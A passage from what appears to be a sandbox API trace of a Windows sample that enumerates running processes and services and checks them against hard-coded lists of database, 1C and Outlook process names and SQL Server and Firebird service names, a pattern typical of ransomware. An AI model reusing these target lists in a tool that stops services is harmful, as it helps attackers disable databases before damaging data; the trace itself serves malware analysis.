	[0158.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0158.282] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0158.282] lstrlenW (lpString="SysMain") returned 7
	[0158.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0158.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0158.282] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0158.282] lstrlenW (lpString="Themes") returned 6
	[0158.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0158.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0158.282] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0158.282] lstrlenW (lpString="TrkWks") returned 6
	[0158.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0158.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0158.282] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0158.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0158.282] lstrlenW (lpString="UxSms") returned 5
	[0158.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0158.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0158.283] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0158.283] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0158.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0158.283] lstrlenW (lpString="Winmgmt") returned 7
	[0158.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0158.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0158.283] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0158.283] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0158.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0158.283] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0158.283] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4
	[0158.285] Process32FirstW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0158.286] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0158.286] lstrlenW (lpString="System") returned 6
	[0158.286] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0158.286] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0158.286] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0158.286] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0158.286] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0158.286] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0158.286] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0158.286] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0158.286] lstrlenW (lpString="smss.exe") returned 8
	[0158.286] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0158.286] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0158.287] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0158.287] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0158.287] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0158.287] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0158.287] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0158.287] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0158.287] lstrlenW (lpString="csrss.exe") returned 9
	[0158.287] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0158.287] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0158.287] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0158.287] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0158.287] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0158.287] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0158.287] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0158.287] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0158.287] lstrlenW (lpString="wininit.exe") returned 11
	[0158.288] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0158.288] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0158.288] lstrlenW (lpString="csrss.exe") returned 9
	[0158.288] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0158.288] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0158.288] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0158.288] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0158.288] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0158.288] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0158.288] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0158.289] lstrlenW (lpString="winlogon.exe") returned 12
	[0158.289] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0158.289] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0158.289] lstrlenW (lpString="services.exe") returned 12
	[0158.289] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0158.289] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0158.289] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0158.290] lstrlenW (lpString="lsass.exe") returned 9
	[0158.290] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0158.290] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0158.290] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0158.290] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0158.290] lstrlenW (lpString="lsm.exe") returned 7
	[0158.290] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0158.290] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0158.290] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0158.290] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0158.290] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.291] lstrlenW (lpString="svchost.exe") returned 11
	[0158.291] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0158.291] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0158.291] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0158.291] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0158.291] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0158.291] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0158.291] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.291] lstrlenW (lpString="svchost.exe") returned 11
	[0158.291] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.292] lstrlenW (lpString="svchost.exe") returned 11
	[0158.292] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.292] lstrlenW (lpString="svchost.exe") returned 11
	[0158.292] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.292] lstrlenW (lpString="svchost.exe") returned 11
	[0158.292] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0158.293] lstrlenW (lpString="audiodg.exe") returned 11
	[0158.293] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.293] lstrlenW (lpString="svchost.exe") returned 11
	[0158.293] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.293] lstrlenW (lpString="svchost.exe") returned 11
	[0158.294] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0158.294] lstrlenW (lpString="spoolsv.exe") returned 11
	[0158.294] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.294] lstrlenW (lpString="svchost.exe") returned 11
	[0158.294] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0158.295] lstrlenW (lpString="taskhost.exe") returned 12
	[0158.295] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0158.295] lstrlenW (lpString="userinit.exe") returned 12
	[0158.295] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0158.295] lstrlenW (lpString="dwm.exe") returned 7
	[0158.295] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0158.296] lstrlenW (lpString="explorer.exe") returned 12
	[0158.296] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0158.296] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0158.296] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0158.296] lstrlenW (lpString="reader_sl.exe") returned 13
	[0158.296] Process32NextW (in: hSnapshot=0x1b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0158.297] CloseHandle (hObject=0x1b4) returned 1
	[0158.297] Sleep (dwMilliseconds=0x1f4) 
	[0158.874] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7b65ba8
	[0158.875] EnumServicesStatusExW (in: hSCManager=0x7b65ba8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0158.875] GetLastError () returned 0xea
	[0158.875] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xf64) returned 0xb612378
	[0158.875] EnumServicesStatusExW (in: hSCManager=0x7b65ba8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xf64, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0158.876] CloseServiceHandle (hSCObject=0x7b65ba8) returned 1
	[0158.876] lstrlenW (lpString="Appinfo") returned 7
	[0158.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0158.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0158.876] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0158.876] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0158.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0158.876] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0158.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0158.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0158.876] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0158.876] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0158.877] lstrlenW (lpString="AudioSrv") returned 8
	[0158.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0158.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0158.877] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0158.877] lstrlenW (lpString="BFE") returned 3
	[0158.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0158.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0158.877] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0158.877] lstrlenW (lpString="CryptSvc") returned 8
	[0158.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0158.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0158.877] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0158.877] lstrlenW (lpString="CscService") returned 10
	[0158.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0158.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0158.877] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0158.878] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0158.878] lstrlenW (lpString="DcomLaunch") returned 10
	[0158.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0158.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0158.878] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0158.878] lstrlenW (lpString="Dhcp") returned 4
	[0158.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0158.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0158.878] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0158.878] lstrlenW (lpString="Dnscache") returned 8
	[0158.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0158.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0158.878] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0158.878] lstrlenW (lpString="DPS") returned 3
	[0158.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0158.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0158.878] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0158.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0158.878] lstrlenW (lpString="eventlog") returned 8
	[0158.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0158.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0158.879] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0158.879] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0158.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0158.879] lstrlenW (lpString="EventSystem") returned 11
	[0158.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0158.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0158.879] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0158.879] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0158.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0158.879] lstrlenW (lpString="gpsvc") returned 5
	[0158.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0158.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0158.879] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0158.879] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0158.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0158.879] lstrlenW (lpString="iphlpsvc") returned 8
	[0158.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0158.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0158.879] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0158.879] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0158.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0158.879] lstrlenW (lpString="LanmanServer") returned 12
